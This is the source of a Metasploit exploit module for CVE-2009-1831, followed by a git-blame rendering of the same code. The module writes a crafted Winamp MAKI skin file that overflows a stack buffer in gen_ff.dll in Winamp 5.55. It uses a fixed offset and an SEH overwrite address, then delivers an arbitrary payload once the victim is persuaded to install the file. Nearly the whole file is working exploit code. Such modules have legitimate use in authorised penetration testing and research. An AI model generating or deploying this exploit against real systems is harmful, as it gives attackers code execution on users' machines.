metasploit-framework/modules/exploits/windows/fileformat/winamp_maki_bof.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Winamp MAKI Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack based buffer overflow in Winamp 5.55. The flaw
        exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,
        where memmove is used with in a insecure way with user controlled data.

        To exploit the vulnerability the attacker must convince the attacker to install the
        generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin,
        or generate a new skin using the crafted mcvcore.maki file. The module has been
        tested successfully on Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Monica Sojeong Hong', # Vulnerability Discovery
          'juan vazquez'	# Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2009-1831'],
          [ 'OSVDB', '54902'],
          [ 'BID', '35052'],
          [ 'EDB', '8783'],
          [ 'EDB', '8772'],
          [ 'EDB', '8770'],
          [ 'EDB', '8767'],
          [ 'URL', 'http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'       => 4000,
          'DisableNops' => true,
          'BadChars'    => ""
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          # winamp.exe 5.5.5.2405
          [ 'Winamp 5.55 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret' => 0x12f02bc3, # ppr from in_mod.dll
              'Offset' => 16756
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'May 20 2009',
      'DefaultTarget'  => 0))

    deregister_options('FILENAME')
  end

  def file_format_filename
    'mcvcore.maki'
  end

  def exploit

    sploit = rand_text(target['Offset'])
    sploit << generate_seh_record(target.ret)
    sploit << payload.encoded
    length_sploit = [sploit.length].pack("v")

    header = "\x46\x47" # magic
    header << "\x03\x04" # version
    header << "\x17\x00\x00\x00"
    types  = "\x01\x00\x00\x00" # count
    # class 1 => Object
    types << "\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5\x32\x35\xF3\xE7"
    # functions
    functions = "\x37\x00\x00\x00" # count
    #function 1
    functions << "\x01\x01" # class
    functions << "\x00\x00" # dummy
    functions << length_sploit # function name length
    functions << sploit # crafted function name

    maki = header
    maki << types
    maki << functions

    print_status("Creating '#{file_format_filename}' file ...")

    file_create(maki)

  end

end
Added module for CVE-2009-1831 2012-09-10 14:46:16 +00:00			`##`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
Added module for CVE-2009-1831 2012-09-10 14:46:16 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = NormalRanking`
Added module for CVE-2009-1831 2012-09-10 14:46:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::FILEFORMAT`
			`include Msf::Exploit::Remote::Seh`
Added module for CVE-2009-1831 2012-09-10 14:46:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Winamp MAKI Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a stack based buffer overflow in Winamp 5.55. The flaw`
			`exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,`
			`where memmove is used with in a insecure way with user controlled data.`
Added module for CVE-2009-1831 2012-09-10 14:46:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`To exploit the vulnerability the attacker must convince the attacker to install the`
			`generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin,`
			`or generate a new skin using the crafted mcvcore.maki file. The module has been`
			`tested successfully on Windows XP SP3 and Windows 7 SP1.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Monica Sojeong Hong', # Vulnerability Discovery`
			`'juan vazquez' # Metasploit module`
			`],`
			`'References' =>`
			`[`
			`[ 'CVE', '2009-1831'],`
			`[ 'OSVDB', '54902'],`
			`[ 'BID', '35052'],`
			`[ 'EDB', '8783'],`
			`[ 'EDB', '8772'],`
			`[ 'EDB', '8770'],`
			`[ 'EDB', '8767'],`
			`[ 'URL', 'http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html' ]`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 4000,`
			`'DisableNops' => true,`
			`'BadChars' => ""`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`# winamp.exe 5.5.5.2405`
			`[ 'Winamp 5.55 / Windows XP SP3 / Windows 7 SP1',`
			`{`
			`'Ret' => 0x12f02bc3, # ppr from in_mod.dll`
			`'Offset' => 16756`
			`}`
			`]`
			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => 'May 20 2009',`
			`'DefaultTarget' => 0))`
deregistering FILENAME option 2012-09-10 21:14:14 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`deregister_options('FILENAME')`
			`end`
Added module for CVE-2009-1831 2012-09-10 14:46:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def file_format_filename`
			`'mcvcore.maki'`
			`end`
Added module for CVE-2009-1831 2012-09-10 14:46:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
Added module for CVE-2009-1831 2012-09-10 14:46:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`sploit = rand_text(target['Offset'])`
			`sploit << generate_seh_record(target.ret)`
			`sploit << payload.encoded`
			`length_sploit = [sploit.length].pack("v")`
Added module for CVE-2009-1831 2012-09-10 14:46:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`header = "\x46\x47" # magic`
			`header << "\x03\x04" # version`
			`header << "\x17\x00\x00\x00"`
			`types = "\x01\x00\x00\x00" # count`
			`# class 1 => Object`
			`types << "\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5\x32\x35\xF3\xE7"`
			`# functions`
			`functions = "\x37\x00\x00\x00" # count`
			`#function 1`
			`functions << "\x01\x01" # class`
			`functions << "\x00\x00" # dummy`
			`functions << length_sploit # function name length`
			`functions << sploit # crafted function name`
cleanup plus documentation for the maki template 2012-09-10 20:48:04 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`maki = header`
			`maki << types`
			`maki << functions`
Added module for CVE-2009-1831 2012-09-10 14:46:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Creating '#{file_format_filename}' file ...")`
Added module for CVE-2009-1831 2012-09-10 14:46:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`file_create(maki)`
Added module for CVE-2009-1831 2012-09-10 14:46:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`end`
Added module for CVE-2009-1831 2012-09-10 14:46:16 +00:00
			`end`